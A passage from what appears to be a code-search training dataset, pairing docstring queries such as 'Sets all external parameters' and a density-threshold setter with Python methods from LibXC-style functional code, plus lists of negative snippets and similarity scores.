json.load(paramjson)\n params.update(params_var)\n else:\n params_var = {}\n params_var['eta'] = [params['eta']]*24\n params_var['cov'] = [params['sigma']**2]*24\n params.update(params_var)\n \n with open(paramfile, 'w') as paramjson:\n json.dump(params_var, paramjson)\n \n return params", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def get_params(self):\n\n return None", "def get_defaults_jsonschema():\n preproc_schema = schema_utils.unload_jsonschema_from_marshmallow_class(DefaultsConfig)\n props = preproc_schema['properties']\n return {'type': 'object', 'properties': props, 'additionalProperties': False, 'title': 'global_defaults_options', 'description': 'Set global defaults for input and output features'}", "def default_params():\n params = {}\n params['load'] = None\n params['style'] = 'ggplot'\n params['show'] = True\n params['save'] = None\n return params", "def get_cfg_defaults():\n # Return a clone so that the defaults will not be altered\n # This is for the \"local variable\" use pattern recommended by the YACS repo.\n # It will be subsequently overwritten with local YAML.\n return __C.clone()", "def _invocation_params(self) -> Dict[str, Any]:\n return self._default_params", "def get_persisted_default_config_fields(self):\n return []", "def defaults_from(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"defaults_from\")" ]
[ "0.7586267", "0.75206536", "0.7345313", "0.7338341", "0.7124671", "0.708384", "0.7017844", "0.68795174", "0.68700486", "0.6861506", "0.68081266", "0.6789644", "0.672888", "0.670684", "0.670621", "0.6609515", "0.6601124", "0.6569071", "0.6553868", "0.6518829", "0.6501356", "0.6484483", "0.6474542", "0.6459664", "0.6444757", "0.6444757", "0.640728", "0.6397446", "0.63938874", "0.63924783", "0.6391959", "0.6341265", "0.63408846", "0.6337315", "0.6337315", "0.63363016", "0.63363016", "0.6331939", "0.6319714", "0.63148177", "0.6302801", "0.6286927", "0.6286927", "0.627258", "0.6267206", "0.62544084", "0.62524366", "0.6231532", "0.62275934", "0.6226791", "0.6220564", "0.62174106", "0.6213086", "0.6181721", "0.6168646", "0.616586", "0.6163417", "0.6124028", "0.6114368", "0.6103708", "0.6090595", "0.60889435", "0.6087451", "0.6067351", "0.6066823", "0.60586095", "0.60579056", "0.60487884", "0.6034284", "0.60263014", "0.6022118", "0.60129404", "0.5992695", "0.5990232", "0.5983712", "0.59702563", "0.59617233", "0.59599644", "0.59510684", "0.59499776", "0.5944268", "0.59441674", "0.5938543", "0.5937286", "0.5934828", "0.59333736", "0.59233904", "0.59062207", "0.5897115", "0.5895144", "0.5892439", "0.5888124", "0.5888124", "0.5888124", "0.5883893", "0.588337", "0.5881788", "0.5865441", "0.5857899", "0.5854559" ]
0.80710435
0
Sets all external parameters.
def set_ext_params(self, ext_params): num_param = core.xc_func_info_get_n_ext_params(self.xc_func_info) if num_param == 0: raise ValueError("LibXCFunctional '%s' has no external parameters to set." % self.get_name()) if len(ext_params) != num_param: raise ValueError( "The length of the input external parameters (%d) does not match the length of the functional's external parameters (%d)." % (len(ext_params), num_param)) core.xc_func_set_ext_params(self.xc_func, np.asarray(ext_params, dtype=np.double))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def set_params(self):\r\n pass", "def set_params(self, **kwargs):\n ...", "def set_params(self):\n raise NotImplementedError", "def set_params(self, params):", "def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.blending.set_parameters(self.parameters)", "def set_parameters(self,params):\n K3Supervisor.set_parameters(self,params)\n self.gtg.set_parameters(self.parameters)\n self.avoidobstacles.set_parameters(self.parameters)\n self.wall.set_parameters(self.parameters)", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, *argv, **kwargs):\n pass", "def set_params(self, **kwargs) -> NoReturn:\n pass", "def setParams(self, paramSet):\r\n pass", "def _set_parameters(self, parameters):\n self.parameters = parameters\n self._set_points_and_weights()", "def set_params(self, *arg):\n pass", "def setParameters(self, params):\n self.module._setParameters(params)\n # update parameters for learner\n self.learner.setModule(self.module)", "def _set_params(self,x):\r\n self.k._set_params(x)", "def set_parameters(self, params):\n self.kp = params.pgain", "def set_params(self, **params):\n self.check_params(params)\n self.sk_params.update(params)\n return self", "def _apply_params(self):\n config = self.get_startup_config()\n # Pass true to _set_params so we know these are startup values\n self._set_params(config, True)", "def set_parameters(self):\n\n if self.model_with_set_params:\n return\n\n self._model_with_set_params = self._parameter_values.process_model(\n self._unprocessed_model, inplace=False\n )\n self._parameter_values.process_geometry(self.geometry)\n self.model = self._model_with_set_params", "def set_params(self,**kwargs):\n for key in kwargs:\n setattr(self, key, kwargs[key])", "def initializeParameters(self):\n\n self.params[2].value = False\n self.params[3].enabled = False\n self.params[7].value = True\n self.params[7].enabled = False\n self.params[8].value = None\n self.params[8].enabled = False", "def set_params(self, *, params: Params) -> None: # pragma: no cover\n\t\tsuper().set_params(params=params)", "def set_hyperparams(self, params):", "def set_parameters(self, **kwargs):\n self.__multi_layer_perceptron.set_params(**kwargs)", "def init_params(self):\n self.clear()\n self._init_load_data()\n self._init_net_delay_data()", "def set_params(self, **params):\n return super().set_params(**params)", "def set_shape_params(self, params):\n self.alpha = params[0]\n self.beta = params[1]\n self.gamma = params[2]\n self.c500 = params[3]\n self.P0 = params[4]", "def set_params(self, **params):\n\n return super().set_params(**params)", "def _update(self):\n self.all_params = {}\n self._update_experiment_params()\n self._update_preprocessing_params()\n self._update_model_params()", "def setParameters(self, izParameters): #$NON-NLS-1$\r", "def gather_params(self):\n for layer in self.layers:\n for name, value in layer.params.iteritems():\n self.params[name] = value", "def _set_params(self, params, defaults):\n new_params = OrderedDict(\n zip(params, [x if isinstance(x, Parameter) else Parameter() for x in defaults])\n )\n for key, value in self._src.items():\n if key in new_params:\n new_params[key] = value\n\n self._src = new_params", "def _set_params(self, *args, **kwargs):\n\n params = args[0]\n\n # check for attempt to set readonly parameters (read-only or immutable set outside startup)\n self._verify_not_readonly(*args, **kwargs)\n old_config = self._param_dict.get_config()\n\n for (key, val) in params.iteritems():\n log.debug(\"KEY = \" + str(key) + \" VALUE = \" + str(val))\n self._param_dict.set_value(key, val)\n\n new_config = self._param_dict.get_config()\n # check for parameter change\n if not dict_equal(old_config, new_config):\n self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)", "def set_params(self, **parameters):\n for parameter, value in parameters.items():\n if parameter == 'predictor':\n if isinstance(value, chainer.Link):\n del self.predictor\n with self.init_scope():\n self.predictor = value\n else:\n assert False, 'predictor is not Chain instance'\n elif parameter in ['lossfun', 'accfun', 'device']:\n setattr(self, parameter, value)\n else:\n self.sk_params.update({parameter: value})\n return self", "def init_params(self):\n blah", "def update_params(self):\n pass", "def set_params(self, params: Dict) -> None:\n self.leak.set_g(params[\"g_leak\"])\n self.kvhh.set_g(params[\"g_kvhh\"])\n self.cav.set_g(params[\"g_cav\"])\n self.kca.set_g(params[\"g_kca\"])\n self.nap.set_g(params[\"g_nap\"])\n self.tau_ca = params[\"t_ca\"]", "def set_all_param_values(layer, values):\n params = get_all_params(layer)\n for p,v in zip(params, values):\n p.set_value(v)", "def set_physical_params(self, params):\n self.M500 = params[0]\n self.r500 = params[1]\n self.z = params[2]", "def set_external_variables(self, xs):\n try:\n self.Attributes.update(xs)\n except AttributeError as e:\n raise e", "def setParameters(self):\n\n # Set the parameters\n self.taux = 24.2\n self.mu = 0.23\n self.G = 33.75\n self.alpha_0 = 0.05\n self.delta = 0.0075\n self.p = 0.50\n self.I0 = 9500.0\n self.kparam = 0.55", "def set_params(self, **kwargs):\n\n kw_keys = list(kwargs)\n\n if 'alpha' in kw_keys:\n self.alpha = kwargs['alpha']\n\n if 'beta' in kw_keys:\n self.beta = kwargs['beta']\n\n if 'gamma' in kw_keys: \n \tself.gamma = kwargs['gamma']\n\n if 'epsilon' in kw_keys:\n self.epsilon = kwargs['epsilon']\n \n self.nact = self.highbound-self.lowbound\n self.actions = np.arange(self.nact)", "def reset_parameters(self):\n self.lin.reset_parameters()\n self.att.reset_parameters()\n self.gnn_score.reset_parameters()\n if self.gnn_intra_cluster is not None:\n self.gnn_intra_cluster.reset_parameters()\n self.select.reset_parameters()", "def set_params(self, **kwargs):\n for param_name, value in kwargs.iteritems():\n # only set parameters that are in the default\n if param_name in self._default_params():\n setattr(self, param_name, value)\n self.params[param_name] = value\n else:\n print('AdjustedStat class does not accept %s as a ' \\\n 'parameter and will be ignored' % param_name)", "def set_params(self, params):\n params = dict_to_namespace(params)\n\n # Set self.params\n self.params = Namespace()\n self.params.ndimx = params.ndimx\n self.params.model_str = getattr(params, 'model_str', 'optfixedsig')\n self.params.ig1 = getattr(params, 'ig1', 4.0)\n self.params.ig2 = getattr(params, 'ig2', 3.0)\n self.params.n1 = getattr(params, 'n1', 1.0)\n self.params.n2 = getattr(params, 'n2', 1.0)\n self.params.sigma = getattr(params, 'sigma', 1e-5)\n self.params.niter = getattr(params, 'niter', 70)\n self.params.kernel = getattr(params, 'kernel', kern_matern)\n self.params.trans_x = getattr(params, 'trans_x', False)", "def params(self,new):\n self._params = new\n self._config_set()\n self._make_model()", "def define_parameters(self):", "def set_params(self, params: Dict):\n\n if params['training_instances'] is not None:\n self.training_instances = params['training_instances']\n if params['n'] is not None:\n self.n = params['n']\n if params['lda'] is not None:\n self.lda = params['lda']\n if params['verbose'] is not None:\n self.verbose = params['verbose']\n\n self.num_features = self.training_instances[0].get_feature_count()\n self.w = None\n self.b = None", "def set_params(self, **kwargs):\n warnings.warn(\"'set_params()' not defined for locator of type \" +\n str(type(self)))", "def updateParameters(self, parameters):", "def set_default_parameters(self):\n super().set_default_parameters()", "def set_params(self, **params: Any) -> Self:\n return _set_params(self, **params)", "def set_param_values(self, flattened_params, **tags):\n self._regressor.set_param_values(flattened_params, **tags)", "def set_params(self, params: Dict) -> None:\n self.leak.set_g(params['g_leak'])\n self.nav.set_g(params['g_nav'])\n self.kvhh.set_g(params['g_kvhh'])\n self.kva.set_g(params['g_kva'])\n self.kvsi.set_g(params['g_kvsi'])\n self.cav.set_g(params['g_cav'])\n self.kca.set_g(params['g_kca'])\n self.nap.set_g(params['g_nap'])\n self.kir.set_g(params['g_kir'])\n self.ampar.set_g(params['g_ampar'])\n self.nmdar.set_g(params['g_nmdar'])\n self.gabar.set_g(params['g_gabar'])\n self.tau_ca = params['t_ca']", "def set_parameters(self, **kwargs):\n self.__select_k_best.set_params(**kwargs)", "def SetVariationalParameters(self, data):\n self._SetParameters(data, 'SetVariationalParameters')", "def set_params(self, state_dicts):\n raise NotImplementedError", "def updateParameters(self):\n\n return", "def update_parameters(self):\n # We update gamma, gamma0, lambda and nu in turn (Bottolo et al, 2011)\n self.update_gamma()\n self.update_gamma0()\n self.update_lambda()\n self.update_nu()\n if self.sample_xi:\n self.update_xi()", "def set_parameters(self, f_ext=0):\n self.F_EXT = f_ext", "def set_params(self, params_):\n x_start, x_end = params_[\"lim_fit\"]\n self.find_idx_of_fit_limit(x_start, x_end)\n self.is_error_bar_for_fit = params_[\"use_error_bar\"]\n self.fitting_method1 = params_[\"method1\"]\n self.fitting_method2 = params_[\"method2\"]\n self.qty_to_min = params_[\"qty_to_min\"]\n\n for i, key in enumerate(self.params):\n # self.params[key].set(value=params_[\"val\"][i], min=params_[\"min\"][i], max=params_[\"max\"][i], vary=bool(params_[\"hold\"][i]), brute_step=params_[\"brute_step\"][i])\n if self.params[key].user_data is not None:\n if \"dontGenerate\" in self.params[key].user_data:\n continue\n self.params[key].set(value=params_[key][\"value\"], min=params_[key][\"min\"], max=params_[key][\"max\"], vary=params_[key][\"vary\"], brute_step=params_[key][\"b_step\"])", "def _set_params(self,x):\r\n self.k1._set_params(x[:self.k1.num_params])\r\n self.k2._set_params(x[self.k1.num_params:])", "def _set_params(self,x):\r\n self.k1._set_params(x[:self.k1.num_params])\r\n self.k2._set_params(x[self.k1.num_params:])", "def set_user_parameters(self, **params: dict):\n\n assert params, \"params variable can't be None\"\n for p, val in params.items():\n setattr(self, p, val)\n self.construct_repr_length()", "def set_parameters(self, *args, **kwargs):\n if len(args) > 0:\n if hasattr(args[0], '__iter__'):\n self._parameters = self._Parameters(*args[0])\n elif args[0] is None:\n self._parameters = self._Parameters()\n else:\n self._parameters = self._Parameters(*args)\n else:\n self._parameters = self._Parameters(**kwargs)", "def _set_model_parameters(self, verbose=False):\n from scipy.special import gamma\n\n z0 = self.z0\n\n # set parameters that are constants\n p_v, d_v, cs0, sigma, vout0 = (1, 2, 6.7, 0.1, 25.0)\n p_vB, d_vB, Mach0, p_M, d_M = (4, 2, 0.5, 1, 3)\n\n # calculate amplitudes that make the pdf integrate to 1\n A_v = np.log(10)*p_v/gamma(d_v/p_v)\n A_cs = np.log(10)/np.sqrt(2*np.pi)/sigma\n A_vB = np.log(10)*p_vB/gamma(d_vB/p_vB)\n A_M = np.log(10)*p_M/gamma(d_M/p_M)\n\n # store them in dictionaries\n self.cool_params = dict(A_v=A_v, p_v=p_v, d_v=d_v,\n A_cs=A_cs, cs0=cs0, sigma=sigma, vout0=vout0)\n self.hot_params = dict(A_vB=A_vB, p_vB=p_vB, d_vB=d_vB,\n A_M=A_M, Mach0=Mach0,p_M=p_M,d_M=d_M)\n # SN related parameters that set the reference values for loading factors\n self.params = dict(Esn=1.e51*au.erg, mstar=95.5*au.M_sun, vcool=200*au.km/au.s,\n Mej=10.*au.M_sun, ZSN=0.2, ZISM0=0.02)\n self.params['vej'] = np.sqrt(2.0*self.params['Esn']/self.params['Mej']).to('km/s')\n self.ref_params = dict(Mref=self.params['mstar'],\n pref=self.params['Esn']/(2*self.params['vcool']),\n Eref=self.params['Esn'],\n Zref=self.params['Mej']*self.params['ZSN'])\n\n # coefficients used in conversion from mass to other PDFs\n self.vp = (self.ref_params['pref']/self.params['mstar']).to('km/s').value\n self.vE = np.sqrt(self.ref_params['Eref']/self.params['mstar']).to('km/s').value\n self.Ze = (self.ref_params['Zref']/self.params['mstar']).cgs.value\n\n # parameters for scaling relations from Paper~I\n a = np.array(fit_alpha[z0])\n b = np.array(fit_beta[z0])\n\n self.scaling_params = dict(a=a, b=b)\n if z0 == '2H':\n self.cool_params['vout0'] = 45\n self.cool_params['cs0'] = 7.5\n elif z0 == '500':\n self.cool_params['vout0'] = 45\n self.cool_params['cs0'] = 8.5\n elif z0 == '1000':\n self.cool_params['vout0'] = 60\n self.cool_params['cs0'] = 10.0\n self.scaling_params['A'] = np.round(10.**(np.array(self.scaling_params['a'])),2)\n self.scaling_params['p'] = 1.+np.array(self.scaling_params['b'])\n self.enum=dict(M_cool=0, M_int=1, M_hot=2, M_total=3,\n p_cool=4, p_int=5, p_hot=6, p_total=7,\n E_cool=8, E_int=9, E_hot=10, E_total=11,\n Z_cool=12, Z_int=13, Z_hot=14, Z_total=15)\n\n # print parameters\n if verbose:\n self.show_parameters()", "def init(self, parameters):\n pass", "def _update_params(self):\n pass", "def set_params(model, params): # type: ignore\n for p, p_new in zip(model.parameters(), params):\n p.data = p_new.data", "def restore_parameters(self):\n for p in self.parameters:\n setattr(self, p, self.parameters[p].init_value)\n self.set_symmetry()", "def set_params(**kwargs):\n\t\tif \"study\" in kwargs.keys():\n\t\t\traise TypeError(\"Got an unexpected keyword argument: 'study'\")\n\t\telse:\n\t\t\tfor i in range(len(_RECOGNIZED_ELEMENTS_)):\n\t\t\t\t__settings[_RECOGNIZED_ELEMENTS_[i]] = __fractional(\n\t\t\t\t\t_RECOGNIZED_ELEMENTS_[i], study = \"LC18\", **kwargs)[0]", "def set_enc_params(self, enc_params):\n self.enc_params = enc_params", "def set_params(self, **params):\n if not params:\n # Simple optimization to gain speed (inspect is slow)\n return self\n else:\n self.kwargs.update(params)\n\n return self", "def reset_parameters(self):\n # for item in self.layer_dict.children():\n self.encoder.reset_parameters()\n self.vq.reset_parameters()\n self.generator.reset_parameters()\n\n self.speaker_dict.reset_parameters()\n self.speaker_dense.reset_parameters()", "def monkey_set_params(self, **args):\n self._monkey_set_params_counter += 1\n assert self._args == (args,), 'unexpected additional arguments. Keep the type in mind'", "def _inject_params(self, params):\n\n params.extend([LocaleParam(), CompileDomainsParam(),\n UseFuzzyParam(), StatisticsParam(),\n DirectoryParam(), OutputFileParam()])\n\n return super()._inject_params(params)", "def set(self, **kwargs):\n for key in kwargs:\n if key in self.bool_params:\n self.bool_params[key] = kwargs[key]\n elif key in self.int_params:\n self.int_params[key] = kwargs[key]\n elif key in self.str_params:\n self.str_params[key] = kwargs[key]\n elif key in self.float_params:\n self.float_params[key] = kwargs[key]\n else:\n raise RuntimeError('MOPAC calculator: unknown keyword: ' + key)", "def _setup_params(self,**params):\n ### a parameter might be passed in for one of the extra_pos;\n ### if a key in the params dict is not a *parameter* of this\n ### PO, then try it on the extra_pos\n for n,p in params.items():\n if n not in self.params():\n self.set_parameter_value(n,p)\n del params[n]\n\n Parameterized._setup_params(self,**params)", "def _set_parameters(self, override_previous=True, validate_legality=False,\n **parameters):\n # The 'mode' parameter is only relevant to the current hierarchy\n self.mode = parameters.pop('mode', self.mode)\n\n for name, value in iteritems(parameters):\n if isinstance(value, Pipe):\n if override_previous or (name not in self.__dict__ and\n name not in self._pipes):\n\n self._pipes[name] = value\n\n else:\n if override_previous or (name not in self.__dict__ and\n name not in self._pipes):\n\n if isinstance(value, BaseResource):\n self.add_resources({name: value})\n\n else:\n setattr(self, name, value)\n\n if validate_legality and not self._is_valid_input(name):\n raise AttributeError(\"Unrecognized parameter %r passed to %r\" %\n (name, self.data.name))", "def SetParams(ss, sheet, setMsg):\n if sheet == \"\":\n ss.Params.ValidateSheets(go.Slice_string([\"Network\", \"Sim\"]))\n ss.SetParamsSet(\"Base\", sheet, setMsg)\n if ss.ParamSet != \"\" and ss.ParamSet != \"Base\":\n sps = ss.ParamSet.split()\n for ps in sps:\n ss.SetParamsSet(ps, sheet, setMsg)\n if ss.Learn == LearnType.Hebbian:\n ss.SetParamsSet(\"Hebbian\", sheet, setMsg)\n elif ss.Learn == LearnType.ErrorDriven:\n ss.SetParamsSet(\"ErrorDriven\", sheet, setMsg)", "def setParameters(self, mu=1, k=10, c_a=1.1, c_r=0.5, epsilon=1e-20, **ukwargs):\n\t\tself.mu, self.k, self.c_a, self.c_r, self.epsilon = mu, k, c_a, c_r, epsilon\n\t\tif ukwargs: logger.info('Unused arguments: %s' % (ukwargs))", "def setup_parameters(self):\n structure = self.ctx.structure_initial_primitive\n ecutwfc = []\n ecutrho = []\n\n for kind in structure.get_kind_names():\n try:\n dual = self.ctx.protocol['pseudo_data'][kind]['dual']\n cutoff = self.ctx.protocol['pseudo_data'][kind]['cutoff']\n cutrho = dual * cutoff\n ecutwfc.append(cutoff)\n ecutrho.append(cutrho)\n except KeyError as exception:\n self.abort_nowait('failed to retrieve the cutoff or dual factor for {}'.format(kind))\n\n natoms = len(structure.sites)\n conv_thr = self.ctx.protocol['convergence_threshold'] * natoms\n\n self.ctx.inputs['parameters'] = {\n 'CONTROL': {\n 'restart_mode': 'from_scratch',\n 'tstress': self.ctx.protocol['tstress'],\n },\n 'SYSTEM': {\n 'ecutwfc': max(ecutwfc),\n 'ecutrho': max(ecutrho),\n 'smearing': self.ctx.protocol['smearing'],\n 'degauss': self.ctx.protocol['degauss'],\n 'occupations': self.ctx.protocol['occupations'],\n },\n 'ELECTRONS': {\n 'conv_thr': conv_thr,\n }\n }", "def reset_parameters(self, param_init):\n logger.info('===== Initialize %s with lecun style =====' % self.__class__.__name__)\n for n, p in self.named_parameters():\n init_with_lecun_normal(n, p, param_init)", "def set_params(self, w, b):\n self.w = w\n self.b = b\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def updateParameters(self, parameters):\r\n return", "def parameters(self, parameters):\n\n self._parameters = parameters", "def parameters(self, parameters):\n\n self._parameters = parameters", "def parameters(self, parameters):\n\n self._parameters = parameters", "def set_params(self, parameters: dict = {}):\n for param in parameters:\n for step in self.steps:\n if param.lower() == step[0].lower():\n step[1].set_params(parameters[param])", "def set(self, **parameters):\r\n for name in parameters:\r\n if name in self.prm:\r\n self.prm[name] = parameters[name]\r\n else:\r\n self._illegal_parameter(name)", "def initialize_params(self, params):\n pass" ]
[ "0.7574865", "0.7349388", "0.7286496", "0.7278232", "0.7277006", "0.71515125", "0.712049", "0.712049", "0.712049", "0.712049", "0.712049", "0.70605385", "0.6988655", "0.6949013", "0.67994875", "0.6789911", "0.67877454", "0.67204505", "0.6715573", "0.67097175", "0.6694738", "0.6667838", "0.66278803", "0.6608927", "0.6591698", "0.65838313", "0.65538913", "0.65535563", "0.6548336", "0.6523312", "0.65137726", "0.6473934", "0.6458538", "0.64557403", "0.64483285", "0.6446568", "0.6437455", "0.6430906", "0.64252883", "0.64122784", "0.6411818", "0.6402043", "0.6390152", "0.63873214", "0.6361042", "0.6348618", "0.63478476", "0.6342477", "0.6340527", "0.6337397", "0.63354146", "0.6331966", "0.633193", "0.6331379", "0.6316179", "0.630419", "0.6303985", "0.6302928", "0.6302679", "0.6288184", "0.6273259", "0.6273061", "0.6267544", "0.6264291", "0.6264291", "0.62557983", "0.62323993", "0.6219942", "0.62048614", "0.6201726", "0.62001437", "0.6189989", "0.61855096", "0.6185153", "0.6165686", "0.61613107", "0.61608917", "0.61597246", "0.6158895", "0.61402565", "0.6139046", "0.61369514", "0.6122929", "0.61225563", "0.61205477", "0.61174077", "0.6112867", "0.6112867", "0.6112867", "0.6112867", "0.6112867", "0.6112867", "0.6112867", "0.6112867", "0.6105651", "0.6105651", "0.6105651", "0.6104895", "0.6098388", "0.609833" ]
0.6574025
26
Sets the density threshold below which the functional will not be evaluated.
def set_dens_threshold(self, dens_threshold): if dens_threshold < 0: raise ValueError("The density threshold cannot be smaller than 0.") core.xc_func_set_dens_threshold(self.xc_func, ctypes.c_double(dens_threshold))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def setThreshold(self, threshold): # real signature unknown; restored from __doc__\n pass", "def clear_density(self):\n self._density = None", "def set_threshold(self, threshold):\n self._threshold = check_value_positive('threshold', threshold)", "def threshold(self,thresholdValue):\n # TO DO\n pass", "def clamp(self):\n self.threshold.data.clamp_(self.min_threshold)", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def setThreshold(self, v):\n self._set(threshold=v)\n return self", "def set_sigma_threshold(self, sigma_threshold):\n\n if sigma_threshold < 0:\n raise ValueError(\"The sigma threshold cannot be smaller than 0.\")\n\n core.xc_func_set_sigma_threshold(self.xc_func, ctypes.c_double(sigma_threshold))", "def setThreshold(self, value):\n return self._set(threshold=value)", "def SetThreshold (self,VolumeNode, min, max):\n DisplayNode = VolumeNode.GetScalarVolumeDisplayNode()\n DisplayNode.SetApplyThreshold(True)\n DisplayNode.SetThreshold(min,max)", "def density(self, density):\n\n self._density = density", "def __init__(self, threshold: float = 0.3, initial_val: float = 0.0) -> None:\n self.threshold = threshold\n self.initial_val = initial_val", "def setPowerIfNecessary(self):\n if self.p.power == 0 and self.p.powerDensity > 0:\n self.setPowerFromDensity()", "def unsetThresholdLevel(self):\n return _libsbml.Input_unsetThresholdLevel(self)", "def set_threshold(self, cat, t):\n self.con.execute(\"update ct set threshold=%f where category='%s'\" \n % (t, cat))", "def matrix_filtering_threshold(self, matrix_filtering_threshold):\n\n self._matrix_filtering_threshold = matrix_filtering_threshold", "def set_ref_density(self, ref_density):\n self.ref_density = ref_density", "def infer_threshold(self, x: np.ndarray, fpr: float) -> None:\n self.backend.infer_threshold(self.backend._to_backend_dtype(x), fpr)", "def make_conditional_density(bgm_fit, threshold, sigma, width):\n pass", "def prune_values(self, threshold):\n changed = False\n new_table = dict()\n for assignment in self._table.keys():\n prob = self._table[assignment]\n if prob >= threshold:\n new_table[assignment] = prob\n else:\n changed = True\n\n self._table = new_table\n return changed", "def set_fade_threshold(self, address):\n self.model.fade_address = address", "def set_min_uncertainty(signal, threshold=0.05):\n # Increase Hirex-Sr uncertainties to be a rel error of 5% minimum (JUST FOR TESTING)\n corrected_unc=signal.std_y/signal.y<=0.05\n signal.std_y[corrected_unc]=0.05*signal.y[corrected_unc]\n\n # correction for normalized uncertainties\n if signal.s/signal.m<=0.05:\n signal.s=0.05*signal.m\n\n signal.std_y_norm=scipy.sqrt((signal.std_y / signal.m)**2.0 + ((signal.y / signal.m)*(signal.s / signal.m))**2.0)", "def updateThreshold(self, t):\n\n budget = self.budget\n self.threshold = self.init_threshold * self.diameter * ((budget-t) / self.budget)**self.decay_factor", "def threshold_col_del(self, threshold):\n self.data = self.data.dropna(thresh=threshold*len(self.data), axis=1) \n self.X = self.data.drop(self.target, axis =1)\n self.y = self.data[self.target]", "def threshold(self) -> float:\n return pulumi.get(self, \"threshold\")", "def apply_threshold(da, threshold=1.):\n with np.errstate(all='ignore'):\n result = xr.where(da < threshold, np.nan, da)\n result.attrs = da.attrs\n return result", "def _check_density(density, n_features):\n if density == \"auto\":\n density = 1 / np.sqrt(n_features)\n\n elif density <= 0 or density > 1:\n raise ValueError(\"Expected density in range ]0, 1], got: %r\" % density)\n return density", "def discrete_potential(function, threshold):\n\n return np.where(function >= threshold, 1, 0)", "def set_threshold_from_energy(energy, dryRun=False):\n if energy < 3.5:\n print(\"WARNING: optimal energy threshold should normally be set to half of the beam energy, but some noise will appear below energy threshold of 3.5 keV!\")\n caput(\"BL13J-EA-EXCBR-01:CONFIG:ACQUIRE:EnergyThreshold\",energy)", "def threshold(self) -> Optional[pulumi.Input[float]]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> Optional[pulumi.Input[float]]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> Optional[pulumi.Input[float]]:\n return pulumi.get(self, \"threshold\")", "def set_density(self, density, asset=None):\n self._set_property('pc:density', density, asset)", "def threshold(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"threshold\")", "def threshold(self) -> pulumi.Input[float]:\n return pulumi.get(self, \"threshold\")", "def set_ThresholdValue(self, value):\n super(UpdateTriggerInputSet, self)._set_input('ThresholdValue', value)", "def threshold(self, value):\r\n threshold = 0.5\r\n if value >= threshold:\r\n return 1\r\n else:\r\n return 0", "def apply_threshold(heatmap, threshold):\n heatmap[heatmap <= threshold] = 0\n\n return heatmap", "def setDeletesThreshold(self, v):\n return self._set(deletesThreshold=v)", "def set_density(self, theta, scale):\n self.density = Normal(self.mean(theta), scale)", "def test_soft_threshold():\n assert snet.soft_threshold(10, 100) == 0\n assert snet.soft_threshold(-10, 100) == 0\n assert snet.soft_threshold(10, 3) == 7\n assert snet.soft_threshold(-10, 3) == -7", "def disable_low_freq_out(self):\n self.write(\":SOUR:LFO:STAT OFF\")", "def set_thresh(self, t0=0.5, t1=None):\n self.t0 = t0\n self.t1 = t1", "def SetNarrowBandwidth(self, value: 'double') -> \"void\":\n return _itkReinitializeLevelSetImageFilterPython.itkReinitializeLevelSetImageFilterIF3_SetNarrowBandwidth(self, value)", "def setThreshold1(self, trsh):\n\t\tself.edgeThreshold1 = trsh\n\t\tself.edgeThreshold2 = trsh * 2.5", "def __init__(self, fx=np.greater):\n # Update doc\n\n if fx is None:\n def fx(x): np.logical_not(np.isnan(x).sum(0))\n\n self._fx = fx", "def above_threshold(self, value):\n # We use floating point number here so we have to take care\n return finf(value,self.min) or finf(self.max,value)", "def evaluate(self, threshold=0.5):\n pass", "def __init__(self, window: int = 5, threshold: float = 0.3, initial_val: float = 0.0) -> None:\n self.window = window\n self.threshold = threshold\n self.initial_val = initial_val", "def mask(self):\n\n mask = self.freqs >= self.minimum_threshold\n mask = mask.astype(int)\n self.freqs = self.freqs * mask\n self.sums = self.sums * mask", "def thresholdInput(self,samples):\n self.__thresholdInput(samples)", "async def threshold(self, ctx, threshold: int):\n if threshold > 0:\n self.bot.db.execute(\"UPDATE starboards SET threshold = ? WHERE channel_id = ?\", (threshold, ctx.channel.id))\n await ctx.say(\"star.threshold\", threshold)\n await self.set_topic(ctx.channel.id)\n else:\n await ctx.say(\"star.unsigned\", threshold)", "def updateThresholdValues (self, DoubleSlider, Node, ThMax ):\n DoubleSlider.Slider.minimum = 0\n DoubleSlider.SpinBoxL.setRange(0,ThMax)\n DoubleSlider.Slider.maximum = ThMax\n DoubleSlider.SpinBoxR.setRange(0,ThMax)\n if ThMax!=0:\n DisplayNode = Node.GetScalarVolumeDisplayNode()\n LowerThreshold = DisplayNode.GetLowerThreshold()\n UpperThreshold = DisplayNode.GetUpperThreshold()\n DoubleSlider.Slider.minimumValue = LowerThreshold\n DoubleSlider.Slider.maximumValue = UpperThreshold \n DoubleSlider.SpinBoxL.blockSignals(True)\n DoubleSlider.SpinBoxR.blockSignals(True)\n DoubleSlider.SpinBoxL.value = LowerThreshold\n DoubleSlider.SpinBoxR.value = UpperThreshold\n DoubleSlider.SpinBoxL.blockSignals(False)\n DoubleSlider.SpinBoxR.blockSignals(False)", "def test_unknown_thresholding(self):\n self.cube.coord(var_name=\"threshold\").attributes[\n \"spp__relative_to_threshold\"\n ] = \"between\"\n msg = \"Probabilities to percentiles only implemented for\"\n with self.assertRaisesRegex(NotImplementedError, msg):\n Plugin()._probabilities_to_percentiles(self.cube, self.percentiles)", "def set_suppress_flow(self):\n 